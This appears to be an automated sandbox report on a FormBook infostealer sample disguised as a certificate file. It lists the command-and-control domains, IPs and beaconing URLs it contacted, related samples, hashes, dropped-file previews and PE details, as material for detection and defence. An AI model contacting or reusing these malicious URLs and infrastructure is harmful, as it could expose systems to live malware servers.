            http://www.elettrosistemista.zip/fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/0%Avira URL Cloudsafe
            http://www.3xfootball.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?zh=mxnR0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truefalse
                  		high
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truefalse
                      		high
                      www.techchains.info
                      		66.29.149.46
                      		truefalse
                        		high
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknownfalse
                            		high
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknownfalse
                                		high
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknownfalse
                                          		high
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.antonio-vivaldi.mobi
                                            		unknown
                                            		unknownfalse
                                              		high

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.elettrosistemista.zip/fo8o/?HpnH2=lZrlsdK8B4Q&zh=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.empowermedeco.com/fo8o/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rssnewscast.com/fo8o/?zh=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&HpnH2=lZrlsdK8B4Qtrue
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.elettrosistemista.zip/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.empowermedeco.com/fo8o/?zh=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&HpnH2=lZrlsdK8B4Qtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.magmadokum.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.magmadokum.com/fo8o/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.goldenjade-travel.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.3xfootball.com/fo8o/?HpnH2=lZrlsdK8B4Q&zh=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.rssnewscast.com/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.goldenjade-travel.com/fo8o/true
                                              • Avira URL Cloud: malware
                                              		unknown
                                              http://www.techchains.info/fo8o/false
                                                		high

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.empowermedeco.comauecFLppjswMvwfJiAu.exe, 00000006.00000002.3783040260.0000000005804000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.3784325817.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.3782139985.000000000416E000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.sedo.com/services/parking.php3auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000003F3E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.3782139985.0000000004492000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000004262000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.3782139985.0000000004492000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.0000000004262000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.1654839650.000000000785D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.empowermedeco.com/fo8o/?zh=mxnRnetbtugc.exe, 00000004.00000002.3782139985.0000000004ADA000.00000004.10000000.00040000.00000000.sdmp, auecFLppjswMvwfJiAu.exe, 00000006.00000002.3781244509.00000000048AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            91.195.240.94
                                                                            		www.rssnewscast.comGermany
                                                                            		47846SEDO-ASDEfalse
                                                                            154.215.72.110
                                                                            		www.3xfootball.comSeychelles
                                                                            		132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                            195.110.124.133
                                                                            		elettrosistemista.zipItaly
                                                                            		39729REGISTER-ASITfalse
                                                                            116.50.37.244
                                                                            		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                            		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                            85.159.66.93
                                                                            		natroredirect.natrocdn.comTurkey
                                                                            		34619CIZGITRfalse
                                                                            66.29.149.46
                                                                            		www.techchains.infoUnited States
                                                                            		19538ADVANTAGECOMUSfalse
                                                                            217.196.55.202
                                                                            		empowermedeco.comNorway
                                                                            		29300AS-DIRECTCONNECTNOfalse

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1562318
                                                                            Start date and time:2024-11-25 13:56:02 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 36s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:12
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Certificate 11-19AIS.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@14/7
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 92%
                                                                            • Number of executed functions: 53
                                                                            • Number of non-executed functions: 290
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Certificate 11-19AIS.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            07:57:50API Interceptor10891187x Sleep call for process: netbtugc.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            91.195.240.94Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            rBALT-10212024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.rssnewscast.com/fo8o/
                                                                            154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                            • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                            N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                            • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                            Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.3xfootball.comCertificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            www.goldenjade-travel.comCertificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244
                                                                            glued.htaGet hashmaliciousFormBookBrowse
                                                                            • 116.50.37.244

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            POWERLINE-AS-APPOWERLINEDATACENTERHKORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.216.76.80
                                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.216.76.80
                                                                            Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                            • 156.251.17.224
                                                                            Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            https://trackru.top/usGet hashmaliciousUnknownBrowse
                                                                            • 156.244.41.195
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 154.215.72.110
                                                                            REGISTER-ASITDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 195.110.124.133
                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 195.110.124.133
                                                                            S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 195.110.124.133
                                                                            SEDO-ASDECertificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            Certificate 11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            rDocument11-142024.exeGet hashmaliciousFormBookBrowse
                                                                            • 91.195.240.94
                                                                            8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                            • 91.195.240.19

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\F56GKLK7U4

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.1209935793793442
                                                                            Encrypted:false
                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                                            MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                                            SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                                            SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                                            SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\autBBDF.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Certificate 11-19AIS.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):270848
                                                                            Entropy (8bit):7.994449459526123
                                                                            Encrypted:true
                                                                            SSDEEP:6144:e74hGiaxsOPBHYpegTU5HYOgRfQJPVxZKSLJl+hGR:u4wiayOPCmH9xZTGgR
                                                                            MD5:662CBC86DD42E258769623B2D2E5FD9D
                                                                            SHA1:CB44D95D9BDFB4C0863B7B2924EC56C8B6E2C351
                                                                            SHA-256:FD33FD801FEEB2E8D345C7CD706FA404FD40129A431A715B66C9A33FDCEC3A1B
                                                                            SHA-512:A73D39409FFEBCB335A5F026202482255DE943D320C476A205D01439C4FFDA9B316DE5197D4001C3E8CCE89BD8FC5BC4328E3ACCE65A810263C9B2C703E0C4A4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....FF78..F...n.U@..kNR...78INYO8VTDR6UCWWFCMZTFF78INYO8.TDR8J.YW.J.{.G....&0<.&&+5D4.w4'-#5 f$R.;;7oQ8t..eu.83#m@W^bF78INYOAW].oV2.j7!.p:3.\...t9(.L...5$.M..f4!.eQ*&d/_.TDR6UCWW..MZ.GG7.!..O8VTDR6U.WUGHLQTFV38INYO8VTD.#UCWGFCMzPFF7xINIO8VVDR0UCWWFCM\TFF78INYo<VTFR6UCWWDC..TFV78YNYO8FTDB6UCWWFSMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR.!&/#FCM.[BF7(INY_<VTTR6UCWWFCMZTFF7.IN9O8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78IN

                                                                            C:\Users\user\AppData\Local\Temp\unjust

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\Certificate 11-19AIS.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):270848
                                                                            Entropy (8bit):7.994449459526123
                                                                            Encrypted:true
                                                                            SSDEEP:6144:e74hGiaxsOPBHYpegTU5HYOgRfQJPVxZKSLJl+hGR:u4wiayOPCmH9xZTGgR
                                                                            MD5:662CBC86DD42E258769623B2D2E5FD9D
                                                                            SHA1:CB44D95D9BDFB4C0863B7B2924EC56C8B6E2C351
                                                                            SHA-256:FD33FD801FEEB2E8D345C7CD706FA404FD40129A431A715B66C9A33FDCEC3A1B
                                                                            SHA-512:A73D39409FFEBCB335A5F026202482255DE943D320C476A205D01439C4FFDA9B316DE5197D4001C3E8CCE89BD8FC5BC4328E3ACCE65A810263C9B2C703E0C4A4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....FF78..F...n.U@..kNR...78INYO8VTDR6UCWWFCMZTFF78INYO8.TDR8J.YW.J.{.G....&0<.&&+5D4.w4'-#5 f$R.;;7oQ8t..eu.83#m@W^bF78INYOAW].oV2.j7!.p:3.\...t9(.L...5$.M..f4!.eQ*&d/_.TDR6UCWW..MZ.GG7.!..O8VTDR6U.WUGHLQTFV38INYO8VTD.#UCWGFCMzPFF7xINIO8VVDR0UCWWFCM\TFF78INYo<VTFR6UCWWDC..TFV78YNYO8FTDB6UCWWFSMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR.!&/#FCM.[BF7(INY_<VTTR6UCWWFCMZTFF7.IN9O8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78INYO8VTDR6UCWWFCMZTFF78IN

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.134943968607026
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Certificate 11-19AIS.exe
                                                                            File size:1'203'200 bytes
                                                                            MD5:1e1db5d9c073fcff1706c32d887e3e28
                                                                            SHA1:76cd9d1e4b8817fccba215ecdf8916a8e9bcbe8b
                                                                            SHA256:4de8d7a95ca5edd2a521f7232b56b02d2f684f1638a2a704270631c127ba9c02
                                                                            SHA512:3bcde550451b05e5f0f6040ffead01af2b25625738a4dfaa30817fb6d7c6e933e68624e2954ce9db795c4bca5cd635186bd727ff8b39b38ee9e3da27a3270677
                                                                            SSDEEP:24576:otb20pkaCqT5TBWgNQ7a5yp3ZKcX+7a2PUMdHxzHdUH6A:xVg5tQ7a5ypJKc+7zddHxBq5
                                                                            TLSH:8B45CF1273DE8361C7B25273BA167701BEBF782506A1F96B2FD4093DF820162525EB63
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                            File Icon

                                                                            Icon Hash:aaf3e3e3938382a0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x425f74
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x673C7594 [Tue Nov 19 11:25:08 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007F1C614D4F3Fh
                                                                            jmp 00007F1C614C7F54h
                                                                            int3
                                                                            int3
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [esp+10h]
                                                                            mov ecx, dword ptr [esp+14h]
                                                                            mov edi, dword ptr [esp+0Ch]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
